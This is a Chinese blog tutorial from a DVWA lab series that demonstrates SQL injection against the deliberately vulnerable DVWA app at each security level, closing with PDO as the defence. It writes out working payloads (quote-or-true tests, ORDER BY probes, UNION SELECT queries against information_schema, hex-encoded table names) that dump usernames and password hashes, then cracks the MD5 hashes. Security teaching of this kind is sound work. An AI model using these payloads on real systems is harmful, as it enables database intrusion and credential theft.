Kali渗透测试之DVWA系列(三)——SQL Injection(SQL注入)

最新推荐文章于 2023-06-20 20:08:41 发布
最新推荐文章于 2023-06-20 20:08:41 发布
阅读量1.8k 收藏 21
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45116657/article/details/100010420
版权

目录:
一、SQL注入简介:

  1. SQL注入漏洞原理
  2. SQL注入类型
  3. SQL注入过程

二、实验环境
三、实验步骤

  • 安全级别:LOW
  • 安全级别:Medium
  • 安全级别:High
  • 安全级别:Impossible

一、SQL注入简介

1、SQL注入漏洞原理:

SQL注入漏洞原理:把SQL命令插入到Web表单提交,或输入域名,或网页提交的查询字符串中,从而达到欺骗服务器执行恶意的SQL命令。(即,将恶意的SQL语句拼接到合法的语句中,从而达到执行SQL语句的目的)

2、SQL注入漏洞类型:
  • 字符型
  • 数字型
  • 搜索型
3、SQL注入的过程:
  • 判断是否存在注入,注入的是字符型,数字型,还是搜索型;
  • 猜解SQL查询语句中的字段数;
  • 确定显示位置;
  • 获取当前数据库;
  • 获取数据库中的表;
  • 获取表中的字段名;
  • 下载数据;

二、SQL注入

实验环境:
1、Windows服务器:Win7 ,IP地址:192.168.85.201。启动phpstudy服务;

在这里插入图片描述

2、测试机:物理机Windows10,安装BurpSuite,通过Firefox浏览器远程登录DVWA;

在这里插入图片描述

2、实验过程:
安全级别:Low
(1)设置安全级别为:Low

在这里插入图片描述

(2)查看源码:

在这里插入图片描述

3、源码分析:

根据源码可以看到,Low级别的代码对参数ID没有任何的检查与过滤,存在明显的SQL注入漏洞,并且为字符型的注入。

4、实验操作:

这里插入一个知识点:

浅谈HTTP中GET、POST用法:

  • HTTP定义了与服务器交互的不同方法,最基本的方法有4种,分别是GET,POST,PUT,DELETE。URL全称是资源描述符。我们可以这样认为: 一个URL地址,它用于描述一个网络上的资源,而HTTP中的GET,POST,PUT,DELETE就对应着对这个资源的 查,改,增,删 4个操作。到这里,大家应该有个大概的了解了,GET一般用于获取/查询资源信息,而POST一般用于更新资源信息。
    • Get是最常用的方法,通常用于请求服务器发送某个资源,而且应该是安全的和幂等的。
    • POST方法向服务器提交数据,比如完成表单数据的提交,将数据提交给服务器处理。
    • PUT方法是让服务器用请求的主体部分来创建一个由所请求的URL命名的新文档;如果那个文档存在的话,就用这个主体来代替它。
      .

GET和POST的区别:

  • GET请求的数据会附在URL之后(就是把数据放置在HTTP协议头中),以?分割URL和传输数据,参数之间以&相连,如:login.action?name=hyddd&password=idontknow&verify=%E4%BD%A0%E5%A5%BD。如果数据是英文字母或数字,则原样发送;如果是空格,转换为+;如果是中文或其他字符,则直接把字符串用BASE64加密,得出如:%E4%BD%A0%E5%A5%BD,其中%XX中的XX为该符号以16进制表示的ASCII码值。而与之对应的,POST把提交的数据放置在HTTP包的包体中,文章最下面将会有代码示例。
  • POST的安全性要比GET的安全性高。注意:这里所说的安全性和上面GET提到的“安全”不是同个概念。上面“安全”的含义仅仅是不作数据修改,而这里安全的含义是真正的Security的含义。比如:通过GET提交数据,用户名和密码将明文出现在URL上,因为:(1)登录页面有可能被浏览器缓存,(2)其他人查看浏览器的历史纪录,那么别人就可以拿到你的账号和密码了,除此之外,使用GET提交数据还可能会造成Cross-site request forgery攻击(CSRF,跨站请求伪造,也被称为:one click attack/session riding)。

4.1> 判断是否存在注入,注入的是字符型还是数字型的;

  • 输入1,查询成功,存在SQL注入

在这里插入图片描述

  • 输入1’ or ‘1’='1 或 1’ or ‘1234’ = ‘1234,成功所有结果,证明该SQL注入为字符型;

在这里插入图片描述

4.2> 猜测SQL查询语句中的字段数;

  • 在输入框中输入 1’ order by 1 # 和 1’ order by 2 # 时都返回正常;
  • 对比源码,这条语句的意思是查询users表中user_id为1的数据并按第一或第二字段排列;

在这里插入图片描述
切记:最后的#是将后面的内容注释掉了,同时后面的冒号也被注释掉,但是这个不影响语句的正常执行;

在这里插入图片描述

在这里插入图片描述

在输入框中输入 1’ order by 3 #时,返回错误(Unknown column ‘3’ in ‘order clause’),说明该表输入的字段数为2,有两列数据;

在这里插入图片描述

4.3> 确定字段的显示位置;

当确定字段数之后,接下来使用union select联合查询继续获取数据

1’ union select 1,2 # ——>1在First name中显示,2在Surname中显示;

在这里插入图片描述

4.4> 获取当前数据库名;

输入 1’ union select version(),database() # ——> 在1的位置显示数据库版本,在2的位置显示数据库名;

在这里插入图片描述

4.5> 获取数据库中的表

  • 对于数据库5.0以上的版本,存在information_schema表,这张数据表保存了Mysql服务器所有数据库的信息,如数据库名,数据库的表等信息;
  • 输入 1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
  • 可以看出,DVWA数据库中一共有两个表:guestbook,users

在这里插入图片描述

4.6> 获取表中的字段名;

  • 输入 1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#
  • 可以看出,users表中一共有8个字段:user_id,first_name,last_name,user,password,avatar,last_login,failed_login;

在这里插入图片描述

4.7> 获取数据;

  • 输入 1’ union select user,password from users#

可以看出,已经获取到的用户名和加密信息;

在这里插入图片描述

4.8> 可以通过MD5解密工具(如,SOMD5解密工具),获取密码;

在这里插入图片描述

安全等级:Medium
1、设置安全级别:Medium

在这里插入图片描述

2、查看源码

在这里插入图片描述
在这里插入图片描述

3、源码分析:
  • 可以看到,Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,,’,”,\x1a进行转义;
  • 同时设置了下拉选择表单,控制用户的输入;
  • 可以简单看出,用户只能选择1-5,存在数字型SQL注入;
4、实验过程:

4.1> 判断是否存在注入,注入是字符型还是数字型;

  • 借助Burp Suite工具对抓取的数据包进行修改(Post方式),实现SQL注入。

在这里插入图片描述

4.2> 导入Repeater中;

在这里插入图片描述

4.3> 判断是否存在注入,注入的是字符型还是数字型;

  • 1 and 1=1 或者 1 or 1234 = 1234 //均成功出现结果,存在SQL注入,且为数字型

在这里插入图片描述

4.4> 猜解SQL查询语句中的字段数;

命令:1 order by 2

通过尝试可以得出,判断字段为2

在这里插入图片描述

在这里插入图片描述

4.5> 确定显示位置;

1 union select 1,2 ——> //1显示在First name的位置,2显示在Surname的位置

在这里插入图片描述

4.6> 获取当前数据库名:

  • 输入:1 union select version(),database()#

可以查询到数据库的版本为5.5.53,数据库名dvwa;

在这里插入图片描述

4.6> 获取数据库中的表;

  • 对于数据库mysql5.0以上的版本,存在information——schema表,这张表保存了MySQL服务器所有的数据库的信息,如数据库名,数据库表的信息等等。
  • 输入: 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

通过观察可以看书,DVWA数据库中总共有两个表:guestbook、users

在这里插入图片描述

4.7> 获取指定表中的字段名;

  • 输入: 1 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#
  • 输入转义:1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
  • 因为table_name='users’中带有单引号,会进行转义,所以我们需要将users进行编码;

可以看出,users表中一共有8个字段:user_id,first_name,last_name,user,password,avatar,last_login,failed_login;

在这里插入图片描述

在这里插入图片描述

4.8> 获取数据;

1 union select user,password from users ——> //获取用户名和加密的密码

在这里插入图片描述

可以通过解码用具,获取密码();

在这里插入图片描述

安全等级:High
1、设置安全级别为High

在这里插入图片描述

在这里插入图片描述

2、查看源码

在这里插入图片描述

3、源码分析
  • High级别在SQL查询语句中添加了LIMIT1,以此控制值输入一个结果;
  • 虽然添加了LIMIT1,但是我们可以通过#将其注释掉;
4、实验过程

该过程和low级别的操作基本一致,不同的是另启动一个网页,进行输出操作,简单附两张图说明;

  • 输入:1’ or ‘1234’ = ‘1234 #

在这里插入图片描述

获取用户名和密码;

在这里插入图片描述

安全级别
1、设置安全级别:

在这里插入图片描述

2、查看源码:

在这里插入图片描述

3、源码分析;

Impossible安全级别采用了PDO技术,划清了代码与数据的界限,从而有效地防御SQL注入; 且只有当返回的查询结果数量为1时,才会输出。

weixin_45116657
关注
  • 5
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWA下的SQL注入
07-25
SQL
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWASQL注入
随 风
10-27 2801
一、SQL注入原理 二、SQL注入分类 1、按照数据提交方式分类 (1)GET 注入 (2)POST 注入 (3)Cookie 注入 (4)HTTP 头部注入 2、按照注入点分类 (1)数字型注入点 (2)字符型注入点 (3)搜索型注入点 3、按照执行效果分类 (1)基于布尔的盲注 (2)基于时间的盲注 (3)基于报错的注入 (4)联合查询注入 (5)堆叠注入 (6)宽字节注入 SQL注入流程 (1)判断是否存在注入,是数字型还是字符型 (2)猜解SQL查询语句的字段数 (3)确定显示位置 (4)获取
SQL注入DVWA演示)
qq_45070118的博客
08-05 1832
SQL:结构化查询语言 SQL注入 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。 实验代码: 1’and’ 1’=‘2 1’ or ‘1’ =‘1 1’ or ‘1234’=‘1234 1’ or 1=1 order by 1 # 1’ or 1=1 order by 2 # 1’ union select 1,2# ...
DVWA-WEB漏洞系列SQL注入
woo233的博客
08-09 3138
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库执行。防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
Kali渗透测试DVWA系列7——SQL InjectionSQL注入
浅浅的博客
06-13 3674
目录 一、SQL注入 1、SQL注入漏洞原理 2、SQL注入类型 3、SQL注入过程 二、实验环境 、实验步骤 安全级别LOW 安全等级:Medium 安全级别:High 安全级别:Impossible 一、SQL注入 1、SQL注入漏洞原理 把SQL命令插入到Web表单提交、或输入域名、或页面提交的查询字符串,从而达到欺骗服务器执行恶意的SQL命令。 2、S...
运用kali下的Sqlmap工具对dvwa进行sql注入测试(low
stliu_hbjd的博客
04-27 1975
1、 Windows安装dvwa 2、kali虚机安装 3、上面过程不再详述,简述运用kali上的sqlmap工具进行sql注入 查看数据库 –batch作用是不会询问你输入 全部默认确定省去一个个Y的输入。 运行这个命令后 出现上面结果,经查询原因是,没有声明一个cookie 重新进行抓包F12 再次运行 sqlmap -u “http://X.X.X.X/dvwa-master/vul...
Kali linux在DVWA靶场的SQL注入
qq_74298120的博客
06-20 1447
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
使用Kali Linux Metasploit 对WEB应用进行攻击 以DVWA为例
xujing19920814的博客
10-01 2713
使用Kali Linux Metasploit 对WEB应用进行攻击 以DVWA为例
kali linux(2021)版本 进行DVWA全安全等级反射型XSS攻击并介绍beef-xss的安装及详细使用
weixin_39464539的博客
06-09 1945
xss原理及分类 XSS攻击的原理: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 XSS攻击本质上是一种将恶意脚本嵌入到当前网页并执行的攻击方式。 一般来说存在XSS攻击风险的功能点主要涉及一下两种: 评论功能: 用户输入评论(评论处为攻击代码) 论坛私信功能 用户发送私信(私信内夹带攻击代码) 技术分类 根基 X
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
kali2021.3安装dvwa靶场
02-24
适用人群:刚刚学习kali的爱好者 dvwa是一个入门web渗透的典型靶场,有的朋友喜欢安装到kali机里,所以我编辑了这个教程供朋友们参考,亲自验证有效的!!!
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
kali windows DVWA搭建及测试
01-15
kali windows DVWA搭建及测试,本人亲测可用,如有问题可私信。 DVWA是OWASP官方编写的PHP网站,包含了各种网站常见漏洞,可以学习攻击及修复方式 PHP环境:WAMP(Windows Apache Mysql Php) DVWA源代码下载:...
Kali Linux渗透测试技术详解
02-19
Kali Linux渗透测试技术详解本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识...
node-v9.6.0-x86.msi
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
Python基于机器学习的分布式系统故障诊断系统源代码,分布式系统的故障数据进行分析,设计故障诊断模型,高效地分析并识别故障类别
04-29
基于技术手段(包括但不限于机器学习、深度学习等技术)对分布式系统的故障数据进行分析,设计故障诊断模型,高效地分析并识别故障类别,实现分布式系统故障运维的智能化,快速恢复故障的同时大大降低分布式系统运维工作的难度,减少运维对人力资源的消耗。在分布式系统某个节点发生故障时,故障会沿着分布式系统的拓扑结构进行传播,造成自身节点及其邻接节点相关的KPI指标和发生大量日志异常
JavaScript前端开发的核心语言前端开发的核心语言
最新发布
04-29
javascript 当今互联网时代,JavaScript已经成为了前端开发的核心语言它是一种高级程序设计语言,通常用于网页的交互和动态效果的实现。JavaScript的灵活性以及广泛的使用使得它变得异常重要,能够为用户带来更好的用户体验。 JavaScript的特点之一是它的轻量级,它可以在网页运行无需单独的编译或下载。这意味着网页可以更快地加载并且用户无需安装额外的软件才能运行网页上的JavaScript代码。此外,与HTML和CSS紧密结合,可以直接在HTML文档嵌入,使得网页的开发变得非常便捷。 JavaScript具有动态性,它可以在浏览器实时修改页面内容和样。它可以通过操作DOM(文档对象模型来动态地修改网页的结构和布局,并且可以根据用户的行为实时地响应各种事件,如点击、标悬停、滚动等。这使得开发者可以轻松地为网页添加交互性和动态效果,提供更好的用户体验。 JavaScript也是一种面向对象的语言。它支持对象、类、继承、多态等面向对象编程的概念,使得代码结构更加清晰和可维护。开发者可以创建自定义的对象和方法,对功能进行封装和复用,提高代码的可读性和可维护性。
四则运算自动生成程序安装包
04-29
四则运算自动生成程序安装包
kali linux 渗透测试系列
07-31
Kali Linux是一个由Offensive Security维护的基于Debian的系统,内含有渗透测试工具集,受到世界安全专家的青睐,也是新手入门的很好的选择。它是一个专门用于网络安全渗透测试的操作系统,提供了丰富的工具和资源,用于评估和测试网络的安全性。Kali Linux的安装过程相对简单,也有很多教程可供参考。如果你对Kali Linux渗透测试系列感兴趣,可以查看作者南城无笙的网络安全-渗透测试-Kali Linux教程系列篇,该系列文章详细介绍了Kali Linux的使用和相关工具的应用。[1][2][3]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值